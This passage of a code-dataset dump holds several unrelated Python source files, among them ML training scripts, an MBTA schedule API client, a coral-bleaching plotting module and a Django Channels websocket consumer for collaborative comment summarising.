run_code_from_path)])\napp.add_routes([web.route(\"*\", \"/{suffix:.*}\", run_code_from_hostname)])\n\n\ndef run():\n \"\"\"Run the VM Supervisor.\"\"\"\n settings.check()\n web.run_app(app)\n","sub_path":"vm_supervisor/supervisor.py","file_name":"supervisor.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"96859957","text":"import numpy as np\nfrom scipy.special import expit\n\n\ndef predict_class(x, y, all_theta):\n \"\"\"\n Determines accuracy of model with optimized parameters.\n\n Parameters\n ----------\n x : array_like\n Shape (m, n).\n\n y : array_like\n Shape (m, 1).\n\n all_theta : array_like\n Shape (n + 1, k).\n \"\"\"\n\n y = y.ravel()\n x = np.insert(x, 0, 1, axis=1)\n\n h = expit(x @ all_theta)\n predictions = np.argmax(h, axis=1)\n accuracy = np.mean(predictions == y)\n\n return round(accuracy * 100, 2)\n","sub_path":"multiclass_classification/predict_class.py","file_name":"predict_class.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"218711124","text":"import os\nimport time\n\nimport torch\nimport dateutil.tz\nimport pickle\nfrom tqdm import tqdm\nfrom utils.utils import dice, 
Logger, Saver, adjust_learning_rate\nfrom config import parse_args\nfrom datetime import datetime\nfrom functions import train, validate\nfrom datasets.paths import get_paths\nfrom datasets.hdf5 import HDF5Dataset\nfrom datasets.dataset import build_dataset\n\nfrom torch.utils.data import DataLoader\nfrom models.vnet_parallel import VNet\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom tqdm import tqdm\ndef main():\n\n args = parse_args()\n args.pretrain = True\n print(\"Using GPU: {}\".format(args.local_rank))\n \n base_lr = args.lr # base learning rate\n batch_size = 1\n max_iterations = 20000\n\n cell_size = 96 # size of volume we crop patch from\n patch_size = 64\n puzzle_config = 3 # 2 or 3 for 2X2X2 or 3X3X3 puzzle\n puzzle_num = puzzle_config ** 3\n feature_len = 256 #\n iter_num = 0\n sr_feature_size = 32\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n train_dataset, val_dataset = build_dataset(args)\n args.world_size = len(args.gpu.split(\",\"))\n if args.world_size > 1:\n os.environ['MASTER_PORT'] = args.port\n torch.cuda.set_device(args.local_rank)\n torch.distributed.init_process_group(\n 'nccl'\n )\n device = torch.device('cuda:{}'.format(args.local_rank))\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, num_replicas = len(args.gpu.split(\",\")), rank = args.local_rank)\n else:\n train_sampler = None\n \n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, \n shuffle=(train_sampler is None),\n sampler = train_sampler,\n num_workers=args.num_workers, pin_memory=True)\n \n val_loader = torch.utils.data.DataLoader(\n val_dataset, batch_size=1, \n num_workers=args.num_workers, pin_memory=True)\n\n model = VNet(args.n_channels, args.n_classes, input_size = 64, pretrain = True).cuda(args.local_rank)\n model_ema = VNet(args.n_channels, args.n_classes, input_size = 64, pretrain = True).cuda(args.local_rank)\n optimizer = torch.optim.SGD(model.parameters(), lr = args.lr, momentum=0.9, weight_decay=0.0005)\n #scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, 0.7)\n parallel_state_dict = torch.load(args.load_path)['state_dict']\n new_state_dict = {}\n for key in parallel_state_dict.keys():\n new_state_dict[key[7:]] = parallel_state_dict[key]\n\n model.load_state_dict(new_state_dict)\n model.eval()\n print(\"Loaded weights\")\n print(\"Using Dataset: {}\".format(type(train_dataset)))\n\n features = []\n for i, batch in enumerate(tqdm(train_loader)):\n volume = batch['image'].cuda(args.local_rank, non_blocking = True)\n volume = volume.view((-1,) + volume.shape[2:])\n\n with torch.no_grad():\n q = model(volume, pretrain=True)\n\n features.append(q)\n if i > 100:\n break\n features = torch.cat(features, 0)\n\n pickle.dump(features.cpu().numpy(), open(\"features.pkl\", 'wb'))\n\n \nif __name__ == \"__main__\":\n main()","sub_path":"uda/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"473972778","text":"import pathlib\nimport random\n\nfrom absl import app\nfrom absl import flags\nimport tensorflow as tf\nimport tensorflow_federated as tff\n\nimport data_helpers as data\nimport model_helpers as model\n\n\n# Training hparams\nflags.DEFINE_integer(\"num_rounds\", default=10,\n help=\"Number of rounds of federated averaging.\")\nflags.DEFINE_integer(\"clients_per_round\", default=10,\n help=\"Number of clients to sample for training per 
round.\")\nflags.DEFINE_float(\"client_learning_rate\", default=.02,\n help=\"Learning rate for client optimizers.\")\nflags.DEFINE_float(\"server_learning_rate\", default=1.0,\n help=\"Learning rate for client optimizers.\")\nflags.DEFINE_integer(\"client_batch_size\", default=4,\n help=\"Local batch size for each client.\")\n\n# Data flags\nflags.DEFINE_string(\"data_root\", default=\"./data\",\n help=\"Path to the root folder containing chest xray data\")\nflags.DEFINE_string(\"train_clients_subdir\", default=\"train_clients\",\n help=\"Subdirectory of `data_root` containing data allocated to the \"\n \"training subset of clients.\")\nflags.DEFINE_string(\"test_clients_subdir\", default=\"test_clients\",\n help=\"Subdirectory of `data-root` containing data allocated to the \"\n \"evaluation subset of clients.\")\n\nFLAGS = flags.FLAGS\n\n\ndef main(argv):\n if len(argv) > 1:\n raise app.UsageError('Expected no command-line arguments, '\n 'got: {}'.format(argv))\n dataroot = pathlib.Path(FLAGS.data_root)\n train_path = dataroot.joinpath(FLAGS.train_clients_subdir)\n test_path = dataroot.joinpath(FLAGS.test_clients_subdir)\n train_client_ids = data.make_client_ids(train_path)\n test_client_ids = data.make_client_ids(test_path)\n\n train_client_fn = data.provide_client_data_fn(\n train_path, FLAGS.client_batch_size)\n test_client_fn = data.provide_client_data_fn(\n test_path, FLAGS.client_batch_size)\n\n train_clients = tff.simulation.ClientData.from_clients_and_fn(\n train_client_ids, train_client_fn)\n test_clients = tff.simulation.ClientData.from_clients_and_fn(\n test_client_ids, test_client_fn)\n\n federated_train_data = [\n train_clients.create_tf_dataset_for_client(client_id)\n for client_id in train_client_ids\n ]\n federated_test_data = [\n test_clients.create_tf_dataset_for_client(client_id)\n for client_id in test_client_ids\n ]\n\n model_fn = model.model_fn_factory(FLAGS.model)\n client_opt_fn = lambda: tf.keras.optimizers.SGD(FLAGS.client_learning_rate)\n server_opt_fn = lambda: tf.keras.optimizers.SGD(FLAGS.server_learning_rate)\n\n iterative_process = tff.learning.build_federated_averaging_process(\n model_fn, client_opt_fn, server_opt_fn)\n\n state = iterative_process.initialize()\n for rnd in range(FLAGS.num_rounds):\n round_clients = random.sample(\n federated_train_data, FLAGS.clients_per_round)\n state, metrics = iterative_process.next(state, round_clients)\n print('round {rnd}, metrics={metrics}'.format(rnd=rnd, metrics=metrics))\n\n\nif __name__ == \"__main__\":\n app.run(main)\n","sub_path":"tflib/deprecated/train_tff.py","file_name":"train_tff.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"577946613","text":"import requests\nimport json\nfrom datetime import datetime as dt\n\n'''\nSimple python script to acess the MBTA api and return a json. 
\n'''\n\n#function makes API call to get a list of valid line names \n#this line list will be used to check if user input is valid\ndef create_lines_list(base_url):\n\n\t#set header and parameters for make_API_Request method params\n\theaders = {\n    'accept': 'application/vnd.api+json',\n\t}\n\n\t#filter routes endpoint to only include Commuter Rail routes\n\tparams = (\n    ('filter[type]', '2'),\n\t)\n\n\tline_response = make_API_Request(base_url, \"routes\", headers, params)\n\tline_list = []\n\tfor i in range(len(line_response)):\n\t\tline_list.append((line_response[i]['id'], (line_response[i]['attributes']['long_name'])))\n\n\treturn line_list\n\n#method to create a list of all stops on a certain Commuter Rail Line\n#@pa\ndef create_stops_list(line_id, base_url):\n\n\theaders = {\n    'accept': 'application/vnd.api+json',\n\t}\n\n\tparams = (\n    ('filter[route]', line_id),\n\t)\n\n\tstop_response = make_API_Request(base_url, \"stops\", headers, params)\n\tstop_list = []\n\n\tfor i in range(len(stop_response)):\n\t\tstop_list.append(stop_response[i]['attributes']['name'])\n\t\tprint(stop_response[i]['attributes']['name'])\n\n\treturn stop_list\n\ndef find_travel_direction(stops, beginning, ending):\n\n\tbegin_index = stops.index(beginning)\n\tend_index = stops.index(ending)\n\n\t#print(f\"Start Index: {begin_index}\")\n\t#print(f'End Index: {end_index}')\n\n\tif begin_index == end_index:\n\t\tprint(\"You have chosen the same stop to get on and off at.\")\n\telif begin_index < end_index:\n\t\treturn 1\n\telse:\n\t\treturn 0\n\ndef find_trips(base_url, direction_id, start_time, line_name, beginning_stop):\n\n\theaders = {\n    'accept': 'application/vnd.api+json',\n\t}\n\n\tparams = (\n\t('page[limit]', '3'),\n    ('sort', 'arrival_time'),\n    ('filter[direction_id]', direction_id),\n    ('filter[min_time]', start_time),\n    ('filter[route]', line_name),\n    ('filter[stop]', beginning_stop),\n\t)\n\n\tprint(beginning_stop)\n\n\ttrip_response = make_API_Request(base_url, \"schedules\", headers, params)\n\ttrip_list = []\n\tfor i in range(len(trip_response)):\n\t\ttrip_list.append(trip_response[i]['relationships']['trip']['data']['id'])\n\t\t#print(trip_response[i]['relationships']['trip']['data']['id'])\n\n\n\treturn trip_list\n\n\ndef find_times(base_url,trip_list, beginning_stop, ending_stop):\n\n\theaders = {\n    'accept': 'application/vnd.api+json',\n\t}\n\n\n\tbegin_times = []\n\tend_times = []\n\tfor i in range(len(trip_list)):\n\n\t\tparams = (\n    \t('filter[trip]', trip_list[i]),\n\t\t)\t\n\n\t\ttime_response = make_API_Request(base_url, 'schedules', headers, params)\n\n\t\tfor k in range(len(time_response)):\n\t\t\tif time_response[k]['relationships']['stop']['data']['id'] == beginning_stop:\n\t\t\t\tbase_time = time_response[k]['attributes']['arrival_time']\n\t\t\t\tprint(base_time)\n\t\t\t\tbegin_times.insert(i, base_time[base_time.index(\"T\") +1 : base_time.index(\"T\")+6])\n\t\t\telif time_response[k]['relationships']['stop']['data']['id'] == ending_stop:\n\t\t\t\tbase_time = time_response[k]['attributes']['arrival_time']\n\t\t\t\tprint(base_time)\n\t\t\t\tend_times.insert(i, base_time[base_time.index(\"T\") +1 : base_time.index(\"T\")+6])\n\n\treturn begin_times, end_times\n\n#base function to make all API requests\n#used to make the process of making API request abstract\ndef make_API_Request(url, end_tag, head, params):\n\n\trequest_url = url + \"/\" + end_tag\n\n\tbase_response = requests.get(request_url, headers = head, params = params)\n\tresponse = json.loads(base_response.text)\n\n\tif base_response.status_code == 200:\n\t\treturn response['data']\n\ndef main():\n\t#base url from which 
def main():\n\t#base url from which we can access the api\n\tbase_url = \"https://api-v3.mbta.com\"\n\n\tlines = create_lines_list(base_url)\n\n\t#the API encodes travel direction as 0/1; mapping kept here for reference\n\tdirection_id = {\"Outbound\": 0, \"Inbound\": 1}\n\n\tline_name = input(\"Please Enter a Commuter Rail Line Name: \")\n\n\t#the schedules/stops filters expect the route id (first element of each pair)\n\tif line_name not in [line[0] for line in lines]:\n\t\tprint(\"Invalid Line Name, Please run again\\n\")\n\t\treturn\n\n\tstops = create_stops_list(line_name, base_url)\n\n\tstarting_stop = input(\"Please Enter the Starting Stop:\\n\")\n\n\tending_stop = input(\"Please Enter the Ending Stop:\\n\")\n\n\tif str(starting_stop) not in stops or str(ending_stop) not in stops:\n\t\tprint(\"Invalid Stops\")\n\t\treturn\n\n\tdirection = find_travel_direction(stops.index(starting_stop), stops.index(ending_stop))\n\tif direction is None:\n\t\treturn\n\n\tbegin_time = input(\"When would you like to leave (Please enter as 24 hour time in format HH:MM):\\n\")\n\n\ttrips = find_trips(base_url, direction, begin_time, line_name, starting_stop)\n\n\ttimes = find_times(base_url, trips, starting_stop, ending_stop)\n\n\tprint(\"Your Options Are:\\n\")\n\tfor i in range(len(times[0])):\n\t\tprint(f\"Get on at {starting_stop} at {times[0][i]} and get off at {ending_stop} at {times[1][i]} \")\n\n\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"OnTime/mbta_api.py","file_name":"mbta_api.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"18405531","text":"\"\"\"CSC110 Fall 2020 Final Project: Global Warming and Coral Bleaching\r\n\r\nCopyright and Usage Information\r\n===============================\r\n\r\nThis file is one of the steps of the project for CSC110. All forms of\r\ndistribution of this code, whether as given or with any changes, are\r\nexpressly prohibited.\r\n\r\nThis file is Copyright (c) 2020 Krystal Miao, Idris Sun, Qianning Lian, Zixiu Meng.\r\n\r\nThis is the main module for manipulating data in the dataset and visualizing our data.\r\n\"\"\"\r\nimport doctest\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport plotly.graph_objects as go\r\nimport python_ta\r\nimport chi_square\r\nfrom ploting import get_xy_data, get_frequency_x_without_repeat, get_frequency_y_coords,\\\r\n get_dhw_y_coords, get_dhw_x_without_repeat\r\nimport model_selection\r\nimport processing_data\r\n\r\n\r\ndef plot_frequency_points(filename: str, power_x: int, power_y: int) -> None:\r\n \"\"\"Plot the frequency and average_bleaching using plotly. Display results in a web browser.\r\n \"\"\"\r\n fig = go.Figure()\r\n sim_data = get_xy_data(filename)\r\n x_coords = get_frequency_x_without_repeat(sim_data, power_x)\r\n y_coords = get_frequency_y_coords(sim_data, x_coords, power_y)\r\n\r\n fig.add_trace(go.Scatter(x=x_coords, y=y_coords, mode='markers', name='Data'))\r\n\r\n fig.show()\r\n
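\r\n\r\n# usage sketch (not in the original module): with the project's dataset file,\r\n# plot_frequency_points(os.getcwd() + '\\\\bcodmo_dataset_773466_712b_5843_9069.csv', 1, 1)\r\n# opens a browser tab with a scatter of TSA frequency against average bleaching.\r\n\r\n\r\ndef plot_dhw_points(filename: str, power_x: int, power_y: int) -> None:\r\n \"\"\"Plot the DHW data and average_bleaching using plotly. 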
Display results in a web browser\"\"\"\r\n fig = go.Figure()\r\n sim_data = get_xy_data(filename)\r\n x_coords = get_dhw_x_without_repeat(sim_data, power_x)\r\n y_coords = get_dhw_y_coords(sim_data, x_coords, power_y)\r\n\r\n fig.add_trace(go.Scatter(x=x_coords, y=y_coords, mode='markers', name='Data'))\r\n\r\n fig.show()\r\n\r\n\r\ndef linear_regression(filename: str, power_x: int, power_y: int) -> None:\r\n \"\"\"Plot the given x- and y-coordinates together with a fitted linear regression\r\n line (the coefficients are used for plotting, not returned)\r\n \"\"\"\r\n sim_data = get_xy_data(filename)\r\n x_coords = get_frequency_x_without_repeat(sim_data, power_x)\r\n y_coords = get_frequency_y_coords(sim_data, x_coords, power_y)\r\n co = np.polyfit(x_coords, y_coords, 1)\r\n func = np.poly1d(co)\r\n plt.plot(x_coords, y_coords, 'yo', x_coords, func(x_coords), '--k')\r\n plt.xlim(0, 25)\r\n plt.ylim(0, 25)\r\n
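\r\n\r\n# worked sketch of the fit above (illustrative): np.polyfit([0, 1, 2], [1, 3, 5], 1) -> array([2., 1.]),\r\n# i.e. slope 2 and intercept 1; np.poly1d turns that coefficient pair into a callable line.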
\r\n\r\nif __name__ == '__main__':\r\n file = os.getcwd() + '\\\\bcodmo_dataset_773466_712b_5843_9069.csv'\r\n header, unit, data = processing_data.load_csv_file(file)\r\n whole_data = processing_data.simplify_data(header, data)\r\n data_unit = {'average_bleaching': processing_data.get_unit(file, 'Average_Bleaching'),\r\n 'TSA_Frequency': processing_data.get_unit(file, 'TSA_Frequency'),\r\n 'TSA_DHW': processing_data.get_unit(file, 'TSA_DHW')}\r\n\r\n result_chi = chi_square.cal_chi_square(chi_square.chi_square(whole_data, 0, 0))\r\n\r\n plot_frequency_points(file, 1, 1)\r\n plot_dhw_points(file, 1, 1)\r\n\r\n best_model = model_selection.model_selection(file, [1, 2], [1, 2])\r\n\r\n linear_regression(file, best_model[0], best_model[1])\r\n\r\n doctest.testmod()\r\n\r\n python_ta.check_all(config={\r\n 'extra-imports': ['sklearn.impute', 'numpy', 'csv', 'matplotlib.pyplot', 'math',\r\n 'statistics', 'model_selection', 'ploting', 'processing_data',\r\n 'sklearn.preprocessing', 'os', 'plotly.graph_objects', 'chi_square'],\r\n 'allowed-io': ['load_csv_file'],\r\n 'max-line-length': 100,\r\n 'disable': ['R1705', 'C0200']\r\n })\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"42910063","text":"from Game2Manager import Game2Manager\nimport os.path\nimport pickle\nimport progressbar\nfrom helpers import prune\n\nmanager = None\ndata = None\ntrain = True\nsizes = 10\nprune_length = -1\ninit = 'uniform'\n\nif os.path.isfile('./instance2.p') and input(\n 'Do you want to load the previous instance? (y/n) ') == 'y':\n data = pickle.load(open('./instance2.p', 'rb'))\n if input(\n 'Do you want to train or test the model? (train/test) ') == 'test':\n train = False\n\nif train and data is None:\n #only the literal answer 'random' switches away from the uniform default\n if input('Init? (random or uniform) [uniform]: ') == 'random':\n init = 'random'\n\n lsizes = input('Init size? [10]: ')\n if lsizes != '':\n sizes = int(lsizes)\n\nif train:\n tmp = input('Prune interval [-1]: ')\n if tmp != '':\n prune_length = int(tmp)\n\n\nmanager = Game2Manager(\n prev_player=data, train=train, sizes=sizes, init_method=init)\ntrials_ = int(input('Enter number of trials: '))\ntrials = trials_\npbartmp = progressbar.ProgressBar(maxval=1).default_widgets()\npbar = progressbar.ProgressBar(\n widgets=pbartmp[:], maxval=trials)\ndel pbartmp\nwins = 0\nloss = 0\nwhile trials > 0:\n manager.simulate()\n\n if manager.check_win() == 1:\n loss += 1\n else:\n wins += 1\n manager.reset()\n\n if prune_length != -1 and trials % prune_length == 0:\n prune(manager.player)\n pbar.update(trials_ - trials)\n trials -= 1\npbar.finish()\nprint(\"Exited with\", str((wins / (wins + loss)) * 100) + \"% winrate\")\n
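\n# arithmetic sketch of the line above (illustrative): wins=30, loss=20 -> (30 / 50) * 100 = 60.0% winrate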
\nif train and input(\"Do you want to dump this instance to disk? (y/n) \") == 'y':\n loc = input('Location [./instance2.p]: ')\n if loc == '':\n manager.player.dump('./instance2.p')\n else:\n manager.player.dump(loc)\n","sub_path":"train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"75843459","text":"from __future__ import print_function\nfrom __future__ import absolute_import\nfrom builtins import str\nimport re\nimport json\nimport random\nimport logging\nfrom asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\nfrom channels.exceptions import StopConsumer\n\n# from channels import Group\n# from channels.auth import channel_session, http_session_user, channel_session_user, channel_session_user_from_http\nfrom .engine import *\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom django.utils.encoding import smart_text\nfrom website.models import Article, Source, CommentRating, CommentAuthor, Permissions\nfrom website.views import recurse_up_post, recurse_down_num_subtree, make_vector, get_summary, clean_parse, delete_node\nfrom website.engine import count_words_shown, count_article\n\nlog = logging.getLogger(__name__)\n\nclass WikumConsumer(WebsocketConsumer):\n \"\"\"\n This chat consumer handles websocket connections for chat clients.\n It extends the synchronous WebsocketConsumer, so its handlers run in a\n worker thread and may use the Django ORM directly. For more, read\n http://channels.readthedocs.io/en/latest/topics/consumers.html\n \"\"\"\n ##### WebSocket event handlers\n\n def connect(self):\n \"\"\"\n Called when the websocket is handshaking as part of initial connection.\n \"\"\"\n # message['path'] = /ws/article/[article_name]/visualization_flags\n self.article_id = self.scope['url_route']['kwargs']['article_id']\n self.group_name = 'article_%s' % self.article_id\n self.user_to_locked_nodes = {}\n\n # Join room group\n async_to_sync(self.channel_layer.group_add)(\n self.group_name,\n self.channel_name\n )\n\n self.accept()\n\n def disconnect(self, close_code):\n # Release locks held by user\n username = self.scope[\"user\"].username if self.scope[\"user\"].is_authenticated else None\n print(username)\n ids = []\n if username in self.user_to_locked_nodes:\n ids = self.user_to_locked_nodes[username]\n message_ids = ids[:]\n data = {'to_lock': False, 'ids': ids, 'type': 'update_locks'}\n message = {'user': username, 'type': 'update_locks', 'ids': message_ids, 'to_lock': False}\n self.handle_update_locks(data, username)\n async_to_sync(self.channel_layer.group_send)(\n self.group_name,\n {\n 'type': 'handle.data',\n 'message': message\n }\n )\n # Leave room group\n async_to_sync(self.channel_layer.group_discard)(\n self.group_name,\n self.channel_name\n )\n raise StopConsumer\n\n def receive(self, text_data):\n try:\n article_id = self.article_id\n article = Article.objects.get(id=article_id)\n except KeyError:\n log.debug('no article in channel_session')\n return\n except Article.DoesNotExist:\n log.debug('received message, but article does not exist id=%s', article_id)\n return\n\n message = {}\n # Parse out an article message from the content text, bailing if it doesn't\n # conform to the expected message format.\n try:\n data = json.loads(text_data)\n user = self.scope[\"user\"]\n req_user = user if user.is_authenticated else None\n username = user.username if user.is_authenticated else None\n if user.is_anonymous:\n username = \"Anonymous\"\n if 'type' in data:\n data_type = data['type']\n if data_type == 'new_node' or data_type == 'reply_comment':\n message = self.handle_message(data, username)\n elif data_type == 'tag_one' or data_type == 'tag_selected':\n message = self.handle_tags(data, username)\n elif data_type == 'delete_tags':\n message = self.handle_delete_tags(data, username)\n elif data_type == 'update_locks':\n message = self.handle_update_locks(data, username)\n elif data_type == 'summarize_comment':\n message = self.handle_summarize_comment(data, username)\n elif data_type == 'summarize_selected':\n message = self.handle_summarize_selected(data, username)\n elif data_type == 'summarize_comments':\n message = self.handle_summarize_comments(data, username)\n elif data_type == 'hide_comment':\n message = self.handle_hide_comment(data, username)\n elif data_type == 'hide_comments':\n message = self.handle_hide_comments(data, username)\n elif data_type == 'hide_replies':\n message = self.handle_hide_replies(data, username)\n elif data_type == 'delete_comment_summary':\n message = self.handle_delete_comment_summary(data, username)\n except ValueError:\n log.debug(\"ws message isn't json text=%s\", text_data)\n return\n\n if message:\n async_to_sync(self.channel_layer.group_send)(\n self.group_name,\n {\n 'type': 'handle.data',\n 'message': message\n }\n )\n
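\n #example inbound frames, as a sketch (ids and values are illustrative only):\n # {\"type\": \"new_node\", \"comment\": \"some text\", \"owner\": \"alice\"}\n # {\"type\": \"tag_one\", \"id\": 12, \"tag\": \"question\", \"id_str\": \"12\"}\n # {\"type\": \"update_locks\", \"ids\": [3, 4], \"to_lock\": true}\n\n def mark_children_summarized(self, post):\n post.summarized = True\n children = Comment.objects.filter(reply_to_disqus=post.disqus_id, article=post.article)\n for child in 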
children:\n child.summarized = True\n child.save()\n self.mark_children_summarized(child)\n\n def recurse_down_post(self, post):\n children = Comment.objects.filter(reply_to_disqus=post.disqus_id, article=post.article)\n for child in children:\n child.json_flatten = \"\"\n child.save()\n self.recurse_down_post(child)\n\n def recurse_down_hidden(self, replies, count):\n for reply in replies:\n if not reply.hidden:\n reply.hidden = True\n reply.json_flatten = ''\n reply.save()\n count += 1\n reps = Comment.objects.filter(reply_to_disqus=reply.disqus_id, article=reply.article)\n count = self.recurse_down_hidden(reps, count)\n return count\n\n def handle_data(self, event):\n message = event['message']\n self.send(text_data=json.dumps(message))\n\n\n def handle_message(self, data, username):\n article_id = self.article_id\n article = Article.objects.get(id=article_id)\n try:\n user = self.scope[\"user\"]\n owner = data.get('owner', None)\n if not owner or owner == \"None\":\n owner = None\n else:\n owner = User.objects.get(username=owner)\n\n permission = None\n if user.is_authenticated:\n permission = Permissions.objects.filter(user=user, article=article)\n if permission.exists():\n permission = permission[0]\n if article.access_mode < 2 or (user.is_authenticated and permission and (permission.access_level < 2)) or user == owner:\n comment = data['comment']\n req_user = user if user.is_authenticated else None\n req_username = user.username if user.is_authenticated else None\n # if commentauthor for username use it; otherwise create it\n author = CommentAuthor.objects.filter(username=req_username)\n if user.is_anonymous:\n req_username = \"Anonymous\"\n author = CommentAuthor.objects.create(username=req_username, anonymous=True, is_wikum=True)\n else:\n if author.exists():\n author = author[0]\n author.is_wikum = True\n author.user = user\n else:\n # existing user who is not a comment author\n author = CommentAuthor.objects.create(username=req_username, is_wikum=True, user=user)\n new_id = random_with_N_digits(10)\n new_comment = None\n explanation = ''\n if data['type'] == 'new_node':\n new_comment = Comment.objects.create(article=article,\n author=author,\n is_replacement=False,\n disqus_id=new_id,\n text=comment,\n summarized=False,\n text_len=len(comment))\n explanation = 'new comment'\n elif data['type'] == 'reply_comment':\n id = data['id']\n c = Comment.objects.get(id=id)\n new_comment = Comment.objects.create(article=article,\n author=author,\n is_replacement=False,\n reply_to_disqus=c.disqus_id,\n disqus_id=new_id,\n text=comment,\n summarized=False,\n text_len=len(comment),\n import_order=c.import_order)\n explanation = 'reply to comment'\n\n new_comment.save()\n action = data['type']\n \n recurse_up_post(new_comment)\n\n recurse_down_num_subtree(new_comment)\n\n # make_vector(new_comment, article)\n article.comment_num = article.comment_num + 1\n words_shown = count_words_shown(article)\n percent_complete = count_article(article)\n h = History.objects.create(user=req_user,\n article=article,\n action=action,\n explanation=explanation,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n h.comments.add(new_comment)\n article.percent_complete = percent_complete\n article.words_shown = words_shown\n article.last_updated = datetime.datetime.now(tz=timezone.utc)\n\n article.save()\n response_dict = {'comment': comment, 'd_id': new_comment.id, 'author': req_username, 'type': data['type'], 'user': req_username}\n if data['type'] == 'reply_comment':\n 
response_dict['parent_did'] = data['id']\n return response_dict\n else:\n return {'user': username}\n except Exception as e:\n print(e)\n return {}\n\n def handle_tags(self, data, username):\n article_id = self.article_id\n article = Article.objects.get(id=article_id)\n try:\n tag = data['tag']\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n\n t, created = Tag.objects.get_or_create(article=article, text=tag.lower().strip())\n if created:\n r = lambda: random.randint(0, 255)\n color = '%02X%02X%02X' % (r(), r(), r())\n t.color = color\n t.save()\n else:\n color = t.color\n\n if data['type'] == 'tag_one':\n id = data['id']\n comment = Comment.objects.get(id=id)\n affected = False\n\n tag_exists = comment.tags.filter(text=t.text)\n if tag_exists.count() == 0:\n comment.tags.add(t)\n affected = True\n\n if affected:\n h = History.objects.create(user=req_user,\n article=article,\n action='tag_comment',\n explanation=\"Add tag %s to a comment\" % t.text,\n words_shown=article.words_shown,\n current_percent_complete=article.percent_complete)\n h.comments.add(comment)\n\n article.last_updated = datetime.datetime.now(tz=timezone.utc)\n article.save()\n\n recurse_up_post(comment)\n\n tag_count = article.comment_set.filter(tags__isnull=False).count()\n if tag_count % 2 == 0:\n from .tasks import generate_tags\n generate_tags.delay(article_id)\n\n if affected:\n response_dict = {'user': username, 'color': color, 'type': data['type'], 'd_id': data['id'], 'tag': data['tag'], 'id_str': data['id_str'], 'did_str': data['id_str']}\n return response_dict\n else:\n return {'user': username}\n elif data['type'] == 'tag_selected':\n ids = data['ids']\n comments = Comment.objects.filter(id__in=ids, hidden=False)\n\n affected_comms = []\n\n for comment in comments:\n tag_exists = comment.tags.filter(text=t.text)\n if tag_exists.count() == 0:\n comment.tags.add(t)\n affected_comms.append(comment)\n\n if affected_comms:\n h = History.objects.create(user=req_user,\n article=article,\n action='tag_comments',\n explanation='Add tag %s to comments' % t.text,\n words_shown=article.words_shown,\n current_percent_complete=article.percent_complete)\n article.last_updated = datetime.datetime.now(tz=timezone.utc)\n article.save()\n\n for com in affected_comms:\n recurse_up_post(com)\n h.comments.add(com)\n\n tag_count = article.comment_set.filter(tags__isnull=False).count()\n if tag_count % 2 == 0:\n from .tasks import generate_tags\n generate_tags.delay(article_id)\n\n if len(affected_comms) > 0:\n response_dict = {'user': username, 'color': color, 'type': data['type'], 'dids': data['ids'], 'tag': data['tag'], 'id_str': data['id_str'], 'did_str': data['id_str']}\n return response_dict\n else:\n return {'user': username}\n except Exception as e:\n print(e)\n return {}\n\n def handle_update_locks(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n ids = data['ids']\n if username not in self.user_to_locked_nodes:\n self.user_to_locked_nodes[username] = []\n for id in ids:\n if username != 'Anonymous':\n c = Comment.objects.get(id=id)\n if data['to_lock']:\n self.user_to_locked_nodes[username].append(id)\n c.is_locked = True\n else:\n self.user_to_locked_nodes[username].remove(id)\n c.is_locked = False\n c.save()\n recurse_up_post(c)\n res = {'user': username, 'type': data['type'], 'ids': data['ids'], 'to_lock': data['to_lock']}\n return res\n except Exception as e:\n print(e)\n return {'user': username}\n
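\n\n #worked sketch of the tag colors above (illustrative): '%02X%02X%02X' % (255, 99, 7) -> 'FF6307',\n #so every newly created tag is assigned a random six-hex-digit color\n def 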
handle_summarize_comment(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n id = data['id']\n summary = data['comment']\n top_summary, bottom_summary = get_summary(summary)\n\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n c = Comment.objects.get(id=id)\n from_summary = c.summary + '\\n----------\\n' + c.extra_summary\n c.summary = top_summary\n c.extra_summary = bottom_summary\n c.save()\n \n if from_summary != '':\n action = 'edit_sum'\n explanation = 'edit summary'\n else :\n action = 'sum_comment'\n explanation = 'initial summary'\n \n recurse_up_post(c)\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user, \n article=a,\n action=action,\n from_str=from_summary,\n to_str=summary,\n explanation=explanation,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n \n h.comments.add(c)\n if from_summary == '':\n a.summary_num = a.summary_num + 1\n a.percent_complete = percent_complete\n a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n a.save()\n res = {'user': username, 'type': data['type'], 'd_id': data['id']}\n if 'wikipedia.org' in a.url:\n if top_summary.strip() != '':\n res['top_summary'] = clean_parse(top_summary)\n 